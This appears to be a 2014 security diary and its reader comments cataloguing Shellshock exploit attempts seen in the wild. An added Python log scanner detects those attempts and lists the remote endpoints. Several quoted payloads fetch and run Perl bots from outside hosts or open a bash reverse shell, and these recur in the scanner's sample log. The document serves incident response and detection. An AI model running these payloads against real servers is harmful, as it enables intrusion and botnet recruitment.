Ever since the Shellshock vulnerability was announced, we have seen a large number of scans probing for it. Here is a quick review of the exploits our honeypots and live servers have seen so far:

1 - Simple "vulnerability checks" that use custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;

This one is a bit different. It includes the tested URL as the User-Agent. But of course, it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message.

() { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

2 - Bots using the Shellshock vulnerability:

This one installs a simple Perl bot. It connects to irc.hacker-newbie.org port 6667, channel #bug.

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\

3 - Vulnerability checks using multiple headers:

GET / HTTP/1.0

4 - Using multiple headers to install a Perl reverse shell (the shell connects to 46.246.34.82 port 1992 in this case):

GET / HTTP/1.1

5 - Using the User-Agent to report system parameters back (the IP address is currently not responding):

GET / HTTP/1.0

6 - User-Agent used to install perl box:

GET / HTTP/1.0
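A way to hunt for these probes in web server logs, as an added example that is not part of the diary or of the thread: the script below scans Apache combined-format access.log lines for the `() {` exported-function prefix that every quoted payload shares, reports which request field carried it, classifies the payload as a bare check, a downloader or a reverse shell, and collects the remote endpoints it reaches out to so they can go into an egress block list or an abuse report. The sample log lines are constructed for this example (modelled on the payloads quoted on this page, with RFC 5737 test addresses wherever the page does not name the source IP); the function and regex names are my own.

```python
import re
from collections import Counter

# Constructed sample access.log (Apache combined format). Payloads are modelled on
# the ones quoted in the diary and comments; client IPs are the ones the thread
# names where it names them, otherwise RFC 5737 test addresses. Timestamps made up.
SAMPLE_LOG = r'''
203.0.113.10 - - [29/Sep/2014:10:00:01 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
66.150.114.30 - - [29/Sep/2014:10:00:02 -0400] "GET /test HTTP/1.0" 404 368 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
198.51.100.23 - - [29/Sep/2014:10:00:03 -0400] "GET /cgi-bin/test.cgi HTTP/1.0" 404 347 "-" "() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;"
198.51.100.24 - - [29/Sep/2014:10:00:04 -0400] "GET / HTTP/1.0" 200 1 "() { :; }; /bin/bash -i >& /dev/tcp/198.51.100.7/80 0>&1" "-"
192.0.2.44 - - [29/Sep/2014:10:00:05 -0400] "GET / HTTP/1.0" 200 1 "-" "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";"
192.0.2.45 - - [30/Sep/2014:08:12:09 -0400] "GET /cgi-bin/status HTTP/1.0" 404 347 "-" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update\""
'''

# A quoted log field; Apache escapes embedded quotes as \" so allow backslash pairs.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"'
)

SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')            # bash function-export prefix
REVSHELL_RE = re.compile(r'/dev/tcp/([^/\s]+)/(\d+)')  # bash network redirection
DOWNLOAD_RE = re.compile(r'\b(?:wget|curl|lwp-download|fetch)\b')
# Hosts/URLs inside the payload: a scheme (optional), an IPv4 or dotted name, an
# optional port and path. The lookbehind keeps it from firing inside local paths.
HOST_RE = re.compile(
    r'''(?<![\w/.@-])(?:https?://)?'''
    r'''(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)'''
    r'''(?::\d+)?(?:/[^\s;"'\\]*)?''', re.I)


def classify(payload):
    """Coarse intent of the injected command string."""
    if REVSHELL_RE.search(payload):
        return "reverse_shell"
    if DOWNLOAD_RE.search(payload):
        return "downloader"
    return "recon"          # echo/uname style checks with no second stage


def analyse(line):
    """Return a finding dict for a line carrying a Shellshock probe, else None."""
    m = SHELLSHOCK_RE.search(line)
    if not m:
        return None
    payload = line[m.end():]
    parsed = LOG_RE.match(line)
    if parsed:
        fields = parsed.groupdict()
        where = [k for k in ("req", "ref", "ua") if SHELLSHOCK_RE.search(fields[k])]
    else:  # unparseable line: still report it, attributed to the first token
        fields = {"ip": line.split(" ", 1)[0], "status": "?"}
        where = []
    iocs = set(HOST_RE.findall(payload))
    rs = REVSHELL_RE.search(payload)
    if rs:
        iocs.add(f"{rs.group(1)}:{rs.group(2)}")
    return {
        "ip": fields["ip"],
        "status": fields["status"],
        "field": ",".join(where) or "unknown",
        "kind": classify(payload),
        "iocs": sorted(iocs),
        "payload": payload.strip()[:60],
    }


def scan(log_text):
    """Run analyse() over every line of a log and keep the hits, in log order."""
    return [f for f in map(analyse, log_text.strip().splitlines()) if f]


def summarise(findings):
    """Counts per payload kind plus the remote endpoints worth blocking/reporting."""
    return {
        "by_kind": dict(Counter(f["kind"] for f in findings)),
        "egress_blocklist": sorted({i for f in findings for i in f["iocs"]}),
    }


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]:15} {h["status"]} {h["field"]:3} {h["kind"]:13} {h["iocs"]}')
    print(summarise(hits))
```

Point it at a real log with `scan(open("access.log").read())`. The 404 status on most hits is expected: the probe fires in the CGI's environment setup regardless of whether the requested script exists, so a 404 in the log is not evidence that the attempt failed; only the absence of outbound connections from the web server user (and of new files under /tmp or /var/tmp) is.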
Johannes 4479 Posts ISC Handler Sep 29th 2014
I've seen the 0v3r1d3 one, as well as one that looks like:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

The document at that URL claims it is another security research company. I also got another that actually delivers a directly malicious payload:

() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"
Ryan 2 Posts
Sep 29th 2014
"legend.txt" looks like an IRC bot written in perl. Connects to chaos.legend.rocks port 7777. Currently about 100 bots in that channel.
Johannes 4479 Posts ISC Handler
Sep 29th 2014
There are also people attempting to create reverse shells - for example "USER-AGENT : () { :; }; /bin/bash -i >& /dev/tcp/[IP_ADDRESS]/80 0>&1".
Anonymous
Sep 29th 2014
66.150.114.30 -- "GET /test HTTP/1.0" 404 368 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
This is the one I'm seeing show up. It's actually the first one I saw.
Zach W 10 Posts
Sep 29th 2014
We've seen about 1000 attempts from a pair of IP addresses with the following:

User-Agent: () { :; }; "exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')";
Max 1 Posts
Sep 30th 2014
Pulled quite a list of perlbot installation attempts out of my web logs.
Sent abuse mails to the providers hosting the C&C IRC servers configured in the perl files. Also got the bash-count.txt hit. I wonder what good that scan is. I guess most admins who find that line in their logs will wget the file manually, and end up as a false positive in the research database.
Visi 41 Posts
Sep 30th 2014
These sample exploits lead me to want to remind everyone of the importance of proper egress filtering.
At least the ones that rely on running 'wget' or 'curl' as the Apache/web server user would not work on my main web server, assuming bash had not been patched :)
Mysid 146 Posts
Sep 30th 2014
I've been caught by number 6 - User-Agent used to install perl box
On attempting to pull down the file onto an isolated test machine, all I get is an HTML welcome page, so I guess that the original exploit has been removed. Can anyone give me more details as to what the original script did so that I can evaluate the damage while we rebuild the system? Thanks, Alex
Mysid 1 Posts
Sep 30th 2014
() { :;}; /bin/bash -c "/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
Appears to be a bot that is trying to look like Google Analytics.
Mysid 1 Posts
Oct 2nd 2014
One of my virtual servers got attacked with that perl box installation:
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 358 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET / HTTP/1.0" 200 1 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /test HTTP/1.0" 404 347 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""

Every time, right after rebooting the server, netstat displayed a bot connection on port 25:

vps-1044161-3266:/etc# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
. . .
tcp        0      0 168.144.XX.XX:25        92.87.210.196:57180     TIME_WAIT   -

The destination address varied from one reboot to another. I made a test and removed the postfix installation from the server. After removing postfix I can't detect any botnet connection on port 25. Unfortunately the postfix is gone, so I'm not able to analyze the postfix binaries any further. But I suggest that ec.z changed the postfix binaries.
Mysid 1 Posts
Oct 2nd 2014
We're still seeing these attacks (from specific IPs - despite complaints to their ISP). They are targeting specific (Perl) files, using this sort of code:

() { (a)=>\\' bash -c 'echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit
() { (a)=>\\' bash -c 'echo;echo \"d2d0\"'e609'd40dabb802ef23ef2ade2ba3;echo;exit
() { :;};echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit
() { :;};echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit
() { :;};echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit
() { :;};echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit

in the referrer and cookie fields. I've not been able to find these in any other exploit posts. I have seen the attempts in a few other google-able logs though. Any idea what they're trying to do?
afbach 6 Posts
Oct 13th 2014